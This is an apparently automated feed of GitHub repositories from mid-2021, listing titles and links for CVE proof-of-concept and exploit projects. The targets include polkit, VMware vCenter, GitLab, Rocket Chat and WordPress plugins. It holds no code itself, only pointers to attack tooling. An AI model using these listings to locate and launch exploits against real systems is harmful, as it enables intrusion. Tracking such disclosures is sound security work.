**Detect Citrix ADC SAML action or SAML iDP Profile config vulnerable to CVE-2020-8300 using Citrix ADC NITRO API** : [stuartcarroll/CitrixADC-CVE-2020-8300](https://github.com/stuartcarroll/CitrixADC-CVE-2020-8300) create time: 2021-06-15T07:21:16Z

**Change the algorithm RS256(asymmetric) to HS256(symmetric) - POC (CVE-2016-10555)** : [FroydCod3r/poc-cve-2016-10555](https://github.com/FroydCod3r/poc-cve-2016-10555) create time: 2021-06-14T16:56:05Z

**no description** : [OLAOLAOLA789/CVE-2018-6574-PTL](https://github.com/OLAOLAOLA789/CVE-2018-6574-PTL) create time: 2021-06-14T15:25:00Z

**no description** : [sujaygr8/CVE-2020-3187](https://github.com/sujaygr8/CVE-2020-3187) create time: 2021-06-14T06:27:11Z

**polkit exploit script v1.0** : [tyleraharrison/CVE-2021-3560_PoC](https://github.com/tyleraharrison/CVE-2021-3560_PoC) create time: 2021-06-14T03:45:38Z

**CVE-2018-19422 Authenticated Remote Code Execution** : [hevox/CVE-2018-19422-SubrionCMS-RCE](https://github.com/hevox/CVE-2018-19422-SubrionCMS-RCE) create time: 2021-06-14T01:50:21Z

**ZeroShell 3.9.0 Remote Command Injection** : [hevox/CVE-2019-12725-Command-Injection](https://github.com/hevox/CVE-2019-12725-Command-Injection) create time: 2021-06-13T23:57:37Z

**wpDiscuz 7.0.4 Remote Code Execution** : [hevox/CVE-2020-24186-wpDiscuz-7.0.4-RCE](https://github.com/hevox/CVE-2020-24186-wpDiscuz-7.0.4-RCE) create time: 2021-06-13T23:10:19Z

**CVE-2021–22201 Arbitrary file read on Gitlab** : [exp1orer/CVE-2021-22201](https://github.com/exp1orer/CVE-2021-22201) create time: 2021-06-13T16:30:47Z

**asjbdjbsad** : [Pluto-123/cve-2021-21985](https://github.com/Pluto-123/cve-2021-21985) create time: 2021-06-13T04:23:35Z

**SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.** : [Abady0x1/CVE-2021-32819](https://github.com/Abady0x1/CVE-2021-32819) create time: 2021-06-12T17:09:48Z

**a reliable C based exploit for CVE-2021-3560.** : [hakivvi/CVE-2021-3560](https://github.com/hakivvi/CVE-2021-3560) create time: 2021-06-12T05:22:35Z

**no description** : [deathflash1411/CVE-2021-3560](https://github.com/deathflash1411/CVE-2021-3560) create time: 2021-06-11T17:19:38Z

**Python2 POC for CVE 2020-11060** : [0xdreadnaught/cve-2020-11060-poc](https://github.com/0xdreadnaught/cve-2020-11060-poc) create time: 2021-06-11T14:52:03Z

**CVE-2021-3560 PrivEsc2root Exploit** : [swapravo/polkadots](https://github.com/swapravo/polkadots) create time: 2021-06-11T14:28:43Z

**no description** : [0xd114/CVE-2021-3156](https://github.com/0xd114/CVE-2021-3156) create time: 2021-06-11T07:06:09Z

**no description** : [sujaygr8/CVE-2020-3452](https://github.com/sujaygr8/CVE-2020-3452) create time: 2021-06-10T05:09:52Z

**PoC for exploiting CVE-2021-24316** : [JamesCVE/CVE-2021-24316](https://github.com/JamesCVE/CVE-2021-24316) create time: 2021-06-10T01:32:26Z

**PoC for exploiting CVE-2020-1920** : [JamesCVE/CVE-2020-1920](https://github.com/JamesCVE/CVE-2020-1920) create time: 2021-06-10T01:06:20Z

**PoC for exploiting CVE-2021-23388** : [JamesCVE/CVE-2021-23388](https://github.com/JamesCVE/CVE-2021-23388) create time: 2021-06-10T01:05:29Z

**no description** : [mavillon1/CVE-2021-33739-POC](https://github.com/mavillon1/CVE-2021-33739-POC) create time: 2021-06-09T06:55:52Z

**Formal verification example for CVE-2020-8835** : [digamma-ai/CVE-2020-8835-verification](https://github.com/digamma-ai/CVE-2020-8835-verification) create time: 2021-06-04T16:15:21Z

**Directory Traversal vulnerability in Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4** : [PwCNO-CTO/CVE-2021-26714](https://github.com/PwCNO-CTO/CVE-2021-26714) create time: 2021-06-08T15:33:51Z

**Directory traversal vulnerability in the spring-boot-actuator-logview library** : [PwCNO-CTO/CVE-2021-21234](https://github.com/PwCNO-CTO/CVE-2021-21234) create time: 2021-06-08T15:31:54Z

**exploit..** : [AssassinUKG/CVE_2018_16509](https://github.com/AssassinUKG/CVE_2018_16509) create time: 2021-06-08T10:15:39Z

**CVE-2017-9554 Exploit Tool** : [Ez0-yf/CVE-2017-9554-Exploit-Tool](https://github.com/Ez0-yf/CVE-2017-9554-Exploit-Tool) create time: 2021-06-08T09:13:52Z

**对CVE-2021-29505进行复现,并分析学了下Xstream反序列化过程** : [MyBlackManba/CVE-2021-29505](https://github.com/MyBlackManba/CVE-2021-29505) create time: 2021-06-08T05:27:57Z

**PoC for exploiting CVE-2017-20005** : [JamesGeeee/CVE-2017-20005](https://github.com/JamesGeeee/CVE-2017-20005) create time: 2021-06-08T01:09:17Z

**PoC for exploiting CVE-2018-1386** : [JamesGeeee/CVE-2018-1386](https://github.com/JamesGeeee/CVE-2018-1386) create time: 2021-06-08T01:25:42Z

**PoC for exploiting CVE-2018-25015** : [JamesGeeee/CVE-2018-25015](https://github.com/JamesGeeee/CVE-2018-25015) create time: 2021-06-08T01:10:51Z

**PoC for exploiting CVE-2019-4031** : [JamesGeeee/CVE-2019-4031](https://github.com/JamesGeeee/CVE-2019-4031) create time: 2021-06-08T01:25:06Z

**PoC for exploiting CVE-2019-25045** : [JamesGeeee/CVE-2019-25045](https://github.com/JamesGeeee/CVE-2019-25045) create time: 2021-06-08T01:11:02Z

**PoC for exploiting CVE-2020-17514** : [JamesGeeee/CVE-2020-17514](https://github.com/JamesGeeee/CVE-2020-17514) create time: 2021-06-08T01:26:09Z

**PoC for exploiting CVE-2020-36007** : [JamesGeeee/CVE-2020-36007](https://github.com/JamesGeeee/CVE-2020-36007) create time: 2021-06-08T01:23:49Z

**PoC for exploiting CVE-2020-36385** : [JamesGeeee/CVE-2020-36385](https://github.com/JamesGeeee/CVE-2020-36385) create time: 2021-06-08T01:23:24Z

**PoC for exploiting CVE-2020-5008** : [JamesGeeee/CVE-2020-5008](https://github.com/JamesGeeee/CVE-2020-5008) create time: 2021-06-08T01:21:57Z

**PoC for exploiting CVE-2020-1719** : [JamesGeeee/CVE-2020-1719](https://github.com/JamesGeeee/CVE-2020-1719) create time: 2021-06-08T01:21:44Z

**PoC for exploiting CVE-2020-14329** : [JamesGeeee/CVE-2020-14329](https://github.com/JamesGeeee/CVE-2020-14329) create time: 2021-06-08T01:21:33Z

**PoC for exploiting CVE-2020-14328** : [JamesGeeee/CVE-2020-14328](https://github.com/JamesGeeee/CVE-2020-14328) create time: 2021-06-08T01:21:28Z

**PoC for exploiting CVE-2020-14327** : [JamesGeeee/CVE-2020-14327](https://github.com/JamesGeeee/CVE-2020-14327) create time: 2021-06-08T01:21:13Z

**PoC for exploiting CVE-2020-10729** : [JamesGeeee/CVE-2020-10729](https://github.com/JamesGeeee/CVE-2020-10729) create time: 2021-06-08T01:21:03Z

**PoC for exploiting CVE-2020-5030** : [JamesGeeee/CVE-2020-5030](https://github.com/JamesGeeee/CVE-2020-5030) create time: 2021-06-08T01:20:46Z

**PoC for exploiting CVE-2020-4495** : [JamesGeeee/CVE-2020-4495](https://github.com/JamesGeeee/CVE-2020-4495) create time: 2021-06-08T01:18:48Z

**PoC for exploiting CVE-2020-4977** : [JamesGeeee/CVE-2020-4977](https://github.com/JamesGeeee/CVE-2020-4977) create time: 2021-06-08T01:18:42Z

**PoC for exploiting CVE-2020-10698** : [JamesGeeee/CVE-2020-10698](https://github.com/JamesGeeee/CVE-2020-10698) create time: 2021-06-08T01:18:27Z

**PoC for exploiting CVE-2020-26142** : [JamesGeeee/CVE-2020-26142](https://github.com/JamesGeeee/CVE-2020-26142) create time: 2021-06-08T01:17:00Z

**PoC for exploiting CVE-2020-28328** : [JamesGeeee/CVE-2020-28328](https://github.com/JamesGeeee/CVE-2020-28328) create time: 2021-06-08T01:16:30Z

**PoC for exploiting CVE-2020-36313** : [JamesGeeee/CVE-2020-36313](https://github.com/JamesGeeee/CVE-2020-36313) create time: 2021-06-08T01:16:25Z

**PoC for exploiting CVE-2020-15225** : [JamesGeeee/CVE-2020-15225](https://github.com/JamesGeeee/CVE-2020-15225) create time: 2021-06-08T01:16:07Z

**PoC for exploiting CVE-2020-18268** : [JamesGeeee/CVE-2020-18268](https://github.com/JamesGeeee/CVE-2020-18268) create time: 2021-06-08T01:15:26Z

**PoC for exploiting CVE-2020-18265** : [JamesGeeee/CVE-2020-18265](https://github.com/JamesGeeee/CVE-2020-18265) create time: 2021-06-08T01:15:20Z

**PoC for exploiting CVE-2020-18264** : [JamesGeeee/CVE-2020-18264](https://github.com/JamesGeeee/CVE-2020-18264) create time: 2021-06-08T01:15:15Z

**PoC for exploiting CVE-2020-36387** : [JamesGeeee/CVE-2020-36387](https://github.com/JamesGeeee/CVE-2020-36387) create time: 2021-06-08T01:11:52Z

**PoC for exploiting CVE-2020-36386** : [JamesGeeee/CVE-2020-36386](https://github.com/JamesGeeee/CVE-2020-36386) create time: 2021-06-08T01:11:40Z

**PoC for exploiting CVE-2020-1742** : [JamesGeeee/CVE-2020-1742](https://github.com/JamesGeeee/CVE-2020-1742) create time: 2021-06-08T01:11:28Z

**PoC for exploiting CVE-2020-1690** : [JamesGeeee/CVE-2020-1690](https://github.com/JamesGeeee/CVE-2020-1690) create time: 2021-06-08T01:11:08Z

**PoC for exploiting CVE-2020-25716** : [JamesGeeee/CVE-2020-25716](https://github.com/JamesGeeee/CVE-2020-25716) create time: 2021-06-07T23:45:51Z

**PoC for exploiting CVE-2021-33839** : [JamesGeeee/CVE-2021-33839](https://github.com/JamesGeeee/CVE-2021-33839) create time: 2021-06-08T01:25:57Z

**PoC for exploiting CVE-2021-22911** : [JamesGeeee/CVE-2021-22911](https://github.com/JamesGeeee/CVE-2021-22911) create time: 2021-06-08T01:25:50Z

**PoC for exploiting CVE-2021-33840** : [JamesGeeee/CVE-2021-33840](https://github.com/JamesGeeee/CVE-2021-33840) create time: 2021-06-08T01:24:46Z

**PoC for exploiting CVE-2021-33838** : [JamesGeeee/CVE-2021-33838](https://github.com/JamesGeeee/CVE-2021-33838) create time: 2021-06-08T01:23:55Z

**PoC for exploiting CVE-2021-22222** : [JamesGeeee/CVE-2021-22222](https://github.com/JamesGeeee/CVE-2021-22222) create time: 2021-06-08T01:23:41Z

**PoC for exploiting CVE-2021-33904** : [JamesGeeee/CVE-2021-33904](https://github.com/JamesGeeee/CVE-2021-33904) create time: 2021-06-08T01:23:34Z

**PoC for exploiting CVE-2021-29099** : [JamesGeeee/CVE-2021-29099](https://github.com/JamesGeeee/CVE-2021-29099) create time: 2021-06-08T01:23:29Z

**PoC for exploiting CVE-2021-20699** : [JamesGeeee/CVE-2021-20699](https://github.com/JamesGeeee/CVE-2021-20699) create time: 2021-06-08T01:23:13Z

**PoC for exploiting CVE-2021-20698** : [JamesGeeee/CVE-2021-20698](https://github.com/JamesGeeee/CVE-2021-20698) create time: 2021-06-08T01:23:01Z

**PoC for exploiting CVE-2021-20517** : [JamesGeeee/CVE-2021-20517](https://github.com/JamesGeeee/CVE-2021-20517) create time: 2021-06-08T01:22:07Z

**PoC for exploiting CVE-2021-30465** : [JamesGeeee/CVE-2021-30465](https://github.com/JamesGeeee/CVE-2021-30465) create time: 2021-06-08T01:21:39Z

**PoC for exploiting CVE-2021-22705** : [JamesGeeee/CVE-2021-22705](https://github.com/JamesGeeee/CVE-2021-22705) create time: 2021-06-08T01:20:55Z

**PoC for exploiting CVE-2021-20338** : [JamesGeeee/CVE-2021-20338](https://github.com/JamesGeeee/CVE-2021-20338) create time: 2021-06-08T01:20:41Z

**PoC for exploiting CVE-2021-31920** : [JamesGeeee/CVE-2021-31920](https://github.com/JamesGeeee/CVE-2021-31920) create time: 2021-06-08T01:20:36Z

**PoC for exploiting CVE-2021-20343** : [JamesGeeee/CVE-2021-20343](https://github.com/JamesGeeee/CVE-2021-20343) create time: 2021-06-08T01:20:31Z

**PoC for exploiting CVE-2021-20347** : [JamesGeeee/CVE-2021-20347](https://github.com/JamesGeeee/CVE-2021-20347) create time: 2021-06-08T01:20:18Z

**PoC for exploiting CVE-2021-20346** : [JamesGeeee/CVE-2021-20346](https://github.com/JamesGeeee/CVE-2021-20346) create time: 2021-06-08T01:20:05Z

**PoC for exploiting CVE-2021-20345** : [JamesGeeee/CVE-2021-20345](https://github.com/JamesGeeee/CVE-2021-20345) create time: 2021-06-08T01:19:57Z

**PoC for exploiting CVE-2021-32458** : [JamesGeeee/CVE-2021-32458](https://github.com/JamesGeeee/CVE-2021-32458) create time: 2021-06-08T01:19:35Z

**PoC for exploiting CVE-2021-20348** : [JamesGeeee/CVE-2021-20348](https://github.com/JamesGeeee/CVE-2021-20348) create time: 2021-06-08T01:19:30Z

**PoC for exploiting CVE-2021-20371** : [JamesGeeee/CVE-2021-20371](https://github.com/JamesGeeee/CVE-2021-20371) create time: 2021-06-08T01:19:25Z

**PoC for exploiting CVE-2021-29670** : [JamesGeeee/CVE-2021-29670](https://github.com/JamesGeeee/CVE-2021-29670) create time: 2021-06-08T01:19:20Z

**PoC for exploiting CVE-2021-29740** : [JamesGeeee/CVE-2021-29740](https://github.com/JamesGeeee/CVE-2021-29740) create time: 2021-06-08T01:19:15Z

**PoC for exploiting CVE-2021-29665** : [JamesGeeee/CVE-2021-29665](https://github.com/JamesGeeee/CVE-2021-29665) create time: 2021-06-08T01:19:06Z

**PoC for exploiting CVE-2021-29668** : [JamesGeeee/CVE-2021-29668](https://github.com/JamesGeeee/CVE-2021-29668) create time: 2021-06-08T01:18:56Z

**PoC for exploiting CVE-2021-31155** : [JamesGeeee/CVE-2021-31155](https://github.com/JamesGeeee/CVE-2021-31155) create time: 2021-06-08T01:18:32Z

**PoC for exploiting CVE-2021-31154** : [JamesGeeee/CVE-2021-31154](https://github.com/JamesGeeee/CVE-2021-31154) create time: 2021-06-08T01:18:16Z

**PoC for exploiting CVE-2021-22543** : [JamesGeeee/CVE-2021-22543](https://github.com/JamesGeeee/CVE-2021-22543) create time: 2021-06-08T01:17:18Z

**PoC for exploiting CVE-2021-31153** : [JamesGeeee/CVE-2021-31153](https://github.com/JamesGeeee/CVE-2021-31153) create time: 2021-06-08T01:17:08Z

**PoC for exploiting CVE-2021-21198** : [JamesGeeee/CVE-2021-21198](https://github.com/JamesGeeee/CVE-2021-21198) create time: 2021-06-08T01:16:53Z

**PoC for exploiting CVE-2020-1750** : [JamesGeeee/CVE-2020-1750](https://github.com/JamesGeeee/CVE-2020-1750) create time: 2021-06-07T23:24:43Z

**PoC for exploiting CVE-2020-4732** : [JamesGeeee/CVE-2020-4732](https://github.com/JamesGeeee/CVE-2020-4732) create time: 2021-06-07T23:08:30Z

**no description** : [suprise4u/CVE-2019-1388](https://github.com/suprise4u/CVE-2019-1388) create time: 2021-06-07T22:29:08Z

**Bludit 3.9.2 - Auth Brute Force Mitigation Bypass. CVE-2019-17240** : [brusergio/bloodit](https://github.com/brusergio/bloodit) create time: 2021-06-07T17:22:40Z

**My implementation for an exploit of the CVE-2020-0041 bug** : [Byte-Master-101/CVE_2020_0041](https://github.com/Byte-Master-101/CVE_2020_0041) create time: 2021-06-07T11:48:43Z

**A simple repository helping to test CVE-2021-3572 in PyPA/pip** : [frenzymadness/CVE-2021-3572](https://github.com/frenzymadness/CVE-2021-3572) create time: 2021-06-07T08:36:47Z

**no description** : [kienquoc102/CVE-2018-9995-P2](https://github.com/kienquoc102/CVE-2018-9995-P2) create time: 2021-06-07T05:57:43Z

**GameLoop update MITM** : [mmiszczyk/cve-2021-33879](https://github.com/mmiszczyk/cve-2021-33879) create time: 2021-06-06T18:05:30Z

**XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03** : [ambalabanov/CVE-2020-9496](https://github.com/ambalabanov/CVE-2020-9496) create time: 2021-06-06T10:32:07Z

**Apache/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions <= 2.7.6 With Different Gadgets** : [Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept](https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept) create time: 2021-06-06T06:41:36Z

**Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10** : [CsEnox/CVE-2021-29440](https://github.com/CsEnox/CVE-2021-29440) create time: 2021-06-06T00:51:21Z

**This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240.** : [Jasmoon99/Embedded-PDF](https://github.com/Jasmoon99/Embedded-PDF) create time: 2021-06-05T18:59:28Z

**no description** : [mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205) create time: 2021-06-05T15:42:16Z

**Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1** : [CsEnox/CVE-2021-22911](https://github.com/CsEnox/CVE-2021-22911) create time: 2021-06-05T15:05:01Z

**PoC for exploiting CVE-2015-5232** : [JamesGeeee/CVE-2015-5232](https://github.com/JamesGeeee/CVE-2015-5232) create time: 2021-06-05T12:17:53Z

**PoC for exploiting CVE-2020-13558** : [JamesGeeee/CVE-2020-13558](https://github.com/JamesGeeee/CVE-2020-13558) create time: 2021-06-05T12:18:56Z

**PoC for exploiting CVE-2020-29323** : [JamesGeeee/CVE-2020-29323](https://github.com/JamesGeeee/CVE-2020-29323) create time: 2021-06-05T12:16:52Z

**PoC for exploiting CVE-2020-29321** : [JamesGeeee/CVE-2020-29321](https://github.com/JamesGeeee/CVE-2020-29321) create time: 2021-06-05T12:16:48Z

**PoC for exploiting CVE-2020-29322** : [JamesGeeee/CVE-2020-29322](https://github.com/JamesGeeee/CVE-2020-29322) create time: 2021-06-05T12:16:45Z

**PoC for exploiting CVE-2020-29324** : [JamesGeeee/CVE-2020-29324](https://github.com/JamesGeeee/CVE-2020-29324) create time: 2021-06-05T12:16:12Z

**PoC for exploiting CVE-2020-13956** : [JamesGeeee/CVE-2020-13956](https://github.com/JamesGeeee/CVE-2020-13956) create time: 2021-06-05T12:12:01Z

**PoC for exploiting CVE-2021-30513** : [JamesGeeee/CVE-2021-30513](https://github.com/JamesGeeee/CVE-2021-30513) create time: 2021-06-05T12:21:04Z

**PoC for exploiting CVE-2021-30510** : [JamesGeeee/CVE-2021-30510](https://github.com/JamesGeeee/CVE-2021-30510) create time: 2021-06-05T12:20:24Z

**PoC for exploiting CVE-2021-22900** : [JamesGeeee/CVE-2021-22900](https://github.com/JamesGeeee/CVE-2021-22900) create time: 2021-06-05T12:20:20Z

**PoC for exploiting CVE-2021-28453** : [JamesGeeee/CVE-2021-28453](https://github.com/JamesGeeee/CVE-2021-28453) create time: 2021-06-05T12:20:16Z

**PoC for exploiting CVE-2021-28326** : [JamesGeeee/CVE-2021-28326](https://github.com/JamesGeeee/CVE-2021-28326) create time: 2021-06-05T12:20:13Z

**PoC for exploiting CVE-2021-20585** : [JamesGeeee/CVE-2021-20585](https://github.com/JamesGeeee/CVE-2021-20585) create time: 2021-06-05T12:20:09Z

**PoC for exploiting CVE-2021-25326** : [JamesGeeee/CVE-2021-25326](https://github.com/JamesGeeee/CVE-2021-25326) create time: 2021-06-05T12:19:54Z

**PoC for exploiting CVE-2021-28242** : [JamesGeeee/CVE-2021-28242](https://github.com/JamesGeeee/CVE-2021-28242) create time: 2021-06-05T12:19:38Z

**PoC for exploiting CVE-2021-23985** : [JamesGeeee/CVE-2021-23985](https://github.com/JamesGeeee/CVE-2021-23985) create time: 2021-06-05T12:19:29Z

**PoC for exploiting CVE-2021-23987** : [JamesGeeee/CVE-2021-23987](https://github.com/JamesGeeee/CVE-2021-23987) create time: 2021-06-05T12:19:26Z

**PoC for exploiting CVE-2021-23986** : [JamesGeeee/CVE-2021-23986](https://github.com/JamesGeeee/CVE-2021-23986) create time: 2021-06-05T12:19:22Z

**PoC for exploiting CVE-2021-23984** : [JamesGeeee/CVE-2021-23984](https://github.com/JamesGeeee/CVE-2021-23984) create time: 2021-06-05T12:19:18Z

**PoC for exploiting CVE-2021-25327** : [JamesGeeee/CVE-2021-25327](https://github.com/JamesGeeee/CVE-2021-25327) create time: 2021-06-05T12:19:04Z

**PoC for exploiting CVE-2021-25328** : [JamesGeeee/CVE-2021-25328](https://github.com/JamesGeeee/CVE-2021-25328) create time: 2021-06-05T12:19:00Z

**PoC for exploiting CVE-2021-23983** : [JamesGeeee/CVE-2021-23983](https://github.com/JamesGeeee/CVE-2021-23983) create time: 2021-06-05T12:18:53Z

**PoC for exploiting CVE-2021-30159** : [JamesGeeee/CVE-2021-30159](https://github.com/JamesGeeee/CVE-2021-30159) create time: 2021-06-05T12:18:50Z

**PoC for exploiting CVE-2021-30178** : [JamesGeeee/CVE-2021-30178](https://github.com/JamesGeeee/CVE-2021-30178) create time: 2021-06-05T12:18:46Z

**PoC for exploiting CVE-2021-3393** : [JamesGeeee/CVE-2021-3393](https://github.com/JamesGeeee/CVE-2021-3393) create time: 2021-06-05T12:18:32Z

**PoC for exploiting CVE-2021-3448** : [JamesGeeee/CVE-2021-3448](https://github.com/JamesGeeee/CVE-2021-3448) create time: 2021-06-05T12:18:27Z

**PoC for exploiting CVE-2021-30123** : [JamesGeeee/CVE-2021-30123](https://github.com/JamesGeeee/CVE-2021-30123) create time: 2021-06-05T12:18:24Z

**PoC for exploiting CVE-2021-29642** : [JamesGeeee/CVE-2021-29642](https://github.com/JamesGeeee/CVE-2021-29642) create time: 2021-06-05T12:18:20Z

**PoC for exploiting CVE-2021-29271** : [JamesGeeee/CVE-2021-29271](https://github.com/JamesGeeee/CVE-2021-29271) create time: 2021-06-05T12:18:17Z

**PoC for exploiting CVE-2021-29272** : [JamesGeeee/CVE-2021-29272](https://github.com/JamesGeeee/CVE-2021-29272) create time: 2021-06-05T12:18:13Z

**PoC for exploiting CVE-2021-29417** : [JamesGeeee/CVE-2021-29417](https://github.com/JamesGeeee/CVE-2021-29417) create time: 2021-06-05T12:18:02Z

**PoC for exploiting CVE-2021-33623** : [JamesGeeee/CVE-2021-33623](https://github.com/JamesGeeee/CVE-2021-33623) create time: 2021-06-05T12:17:49Z

**PoC for exploiting CVE-2021-21989** : [JamesGeeee/CVE-2021-21989](https://github.com/JamesGeeee/CVE-2021-21989) create time: 2021-06-05T12:17:46Z

**PoC for exploiting CVE-2021-33587** : [JamesGeeee/CVE-2021-33587](https://github.com/JamesGeeee/CVE-2021-33587) create time: 2021-06-05T12:17:42Z

**PoC for exploiting CVE-2021-22358** : [JamesGeeee/CVE-2021-22358](https://github.com/JamesGeeee/CVE-2021-22358) create time: 2021-06-05T12:17:39Z

**PoC for exploiting CVE-2021-21987** : [JamesGeeee/CVE-2021-21987](https://github.com/JamesGeeee/CVE-2021-21987) create time: 2021-06-05T12:17:32Z

**PoC for exploiting CVE-2021-33558** : [JamesGeeee/CVE-2021-33558](https://github.com/JamesGeeee/CVE-2021-33558) create time: 2021-06-05T12:17:18Z

**no description** : [testanull/Project_CVE-2021-21985_PoC](https://github.com/testanull/Project_CVE-2021-21985_PoC) create time: 2021-06-05T11:03:13Z

**Drupal 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.** : [0xAJ2K/CVE-2018-7600](https://github.com/0xAJ2K/CVE-2018-7600) create time: 2021-06-05T09:49:56Z

**Proof of Concept CVE-2021-29155** : [Kakashiiiiy/CVE-2021-29155](https://github.com/Kakashiiiiy/CVE-2021-29155) create time: 2021-06-03T15:53:10Z

**CVE-2021-2173** : [emad-almousa/CVE-2021-2173](https://github.com/emad-almousa/CVE-2021-2173) create time: 2021-06-04T05:56:01Z

**CVE-2021-21985 vmware 6.7-9.8 RCE** : [daedalus/CVE-2021-21985](https://github.com/daedalus/CVE-2021-21985) create time: 2021-06-04T01:15:14Z

**Un semplice exploit che sfrutta CVE-2015-7297, CVE-2015-7857 and CVE-2015-7858 per elencare gli utenti con la psw del db** : [areaventuno/exploit-joomla](https://github.com/areaventuno/exploit-joomla) create time: 2020-10-29T00:35:35Z

**PoC for the SQL injection vulnerability in PostgreSQL with Django, found in Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3** : [huzaifakhan771/CVE-2020-7471-Django](https://github.com/huzaifakhan771/CVE-2020-7471-Django) create time: 2021-06-03T11:21:27Z

**stack based buffer overflow in MsIo64.sys, Proof of Concept Local Privilege Escalation to nt authority/system** : [mathisvickie/CVE-2021-27965](https://github.com/mathisvickie/CVE-2021-27965) create time: 2021-06-03T12:39:11Z

**cve-2021-21985 exploit** : [xnianq/cve-2021-21985_exp](https://github.com/xnianq/cve-2021-21985_exp) create time: 2021-06-03T12:17:06Z

**PHPFusion 9.03.50 - Remote Code Execution** : [r90tpass/CVE-2020-24949](https://github.com/r90tpass/CVE-2020-24949) create time: 2021-06-03T09:49:22Z

**CVE-2021-21985 vmware vcenter 远程代码执行 EXP** : [r0ckysec/CVE-2021-21985](https://github.com/r0ckysec/CVE-2021-21985) create time: 2021-06-03T09:59:21Z

**sadsdsssssssssss** : [Pluto-123/CVE-2021-3156sadsad](https://github.com/Pluto-123/CVE-2021-3156sadsad) create time: 2021-06-03T05:16:17Z

**sadsanjdjsand** : [Pluto-123/CVE-2021-3156](https://github.com/Pluto-123/CVE-2021-3156) create time: 2021-06-03T05:15:12Z

**PoC for exploiting CVE-2019-14836** : [JamesGeee/CVE-2019-14836](https://github.com/JamesGeee/CVE-2019-14836) create time: 2021-06-03T00:06:49Z

**PoC for exploiting CVE-2020-22023** : [JamesGeee/CVE-2020-22023](https://github.com/JamesGeee/CVE-2020-22023) create time: 2021-06-03T00:08:09Z

**PoC for exploiting CVE-2020-22022** : [JamesGeee/CVE-2020-22022](https://github.com/JamesGeee/CVE-2020-22022) create time: 2021-06-03T00:08:06Z

**PoC for exploiting CVE-2020-27833** : [JamesGeee/CVE-2020-27833](https://github.com/JamesGeee/CVE-2020-27833) create time: 2021-06-03T00:07:17Z

**PoC for exploiting CVE-2020-4520** : [JamesGeee/CVE-2020-4520](https://github.com/JamesGeee/CVE-2020-4520) create time: 2021-06-03T00:06:24Z

**PoC for exploiting CVE-2020-5030** : [JamesGeee/CVE-2020-5030](https://github.com/JamesGeee/CVE-2020-5030) create time: 2021-06-03T00:05:36Z

**PoC for exploiting CVE-2020-4977** : [JamesGeee/CVE-2020-4977](https://github.com/JamesGeee/CVE-2020-4977) create time: 2021-06-03T00:05:33Z

**PoC for exploiting CVE-2020-4732** : [JamesGeee/CVE-2020-4732](https://github.com/JamesGeee/CVE-2020-4732) create time: 2021-06-03T00:05:30Z

**PoC for exploiting CVE-2020-4495** : [JamesGeee/CVE-2020-4495](https://github.com/JamesGeee/CVE-2020-4495) create time: 2021-06-03T00:05:26Z

**PoC for exploiting CVE-2021-29208** : [JamesGeee/CVE-2021-29208](https://github.com/JamesGeee/CVE-2021-29208) create time: 2021-06-03T00:08:13Z

**PoC for exploiting CVE-2021-32625** : [JamesGeee/CVE-2021-32625](https://github.com/JamesGeee/CVE-2021-32625) create time: 2021-06-03T00:08:02Z

**PoC for exploiting CVE-2021-29206** : [JamesGeee/CVE-2021-29206](https://github.com/JamesGeee/CVE-2021-29206) create time: 2021-06-03T00:07:59Z

**PoC for exploiting CVE-2021-29205** : [JamesGeee/CVE-2021-29205](https://github.com/JamesGeee/CVE-2021-29205) create time: 2021-06-03T00:07:47Z

**PoC for exploiting CVE-2021-29204** : [JamesGeee/CVE-2021-29204](https://github.com/JamesGeee/CVE-2021-29204) create time: 2021-06-03T00:07:31Z

**PoC for exploiting CVE-2021-29202** : [JamesGeee/CVE-2021-29202](https://github.com/JamesGeee/CVE-2021-29202) create time: 2021-06-03T00:07:23Z

**PoC for exploiting CVE-2021-29201** : [JamesGeee/CVE-2021-29201](https://github.com/JamesGeee/CVE-2021-29201) create time: 2021-06-03T00:07:20Z

**PoC for exploiting CVE-2021-20487** : [JamesGeee/CVE-2021-20487](https://github.com/JamesGeee/CVE-2021-20487) create time: 2021-06-03T00:07:13Z

**PoC for exploiting CVE-2021-33200** : [JamesGeee/CVE-2021-33200](https://github.com/JamesGeee/CVE-2021-33200) create time: 2021-06-03T00:07:10Z

**PoC for exploiting CVE-2021-20486** : [JamesGeee/CVE-2021-20486](https://github.com/JamesGeee/CVE-2021-20486) create time: 2021-06-03T00:07:03Z

**PoC for exploiting CVE-2021-20177** : [JamesGeee/CVE-2021-20177](https://github.com/JamesGeee/CVE-2021-20177) create time: 2021-06-03T00:06:27Z

**PoC for exploiting CVE-2021-29670** : [JamesGeee/CVE-2021-29670](https://github.com/JamesGeee/CVE-2021-29670) create time: 2021-06-03T00:06:20Z

**PoC for exploiting CVE-2021-29668** : [JamesGeee/CVE-2021-29668](https://github.com/JamesGeee/CVE-2021-29668) create time: 2021-06-03T00:06:17Z

**PoC for exploiting CVE-2021-20371** : [JamesGeee/CVE-2021-20371](https://github.com/JamesGeee/CVE-2021-20371) create time: 2021-06-03T00:06:14Z

**PoC for exploiting CVE-2021-20348** : [JamesGeee/CVE-2021-20348](https://github.com/JamesGeee/CVE-2021-20348) create time: 2021-06-03T00:06:10Z

**PoC for exploiting CVE-2021-20347** : [JamesGeee/CVE-2021-20347](https://github.com/JamesGeee/CVE-2021-20347) create time: 2021-06-03T00:06:06Z

**PoC for exploiting CVE-2021-20346** : [JamesGeee/CVE-2021-20346](https://github.com/JamesGeee/CVE-2021-20346) create time: 2021-06-03T00:06:02Z

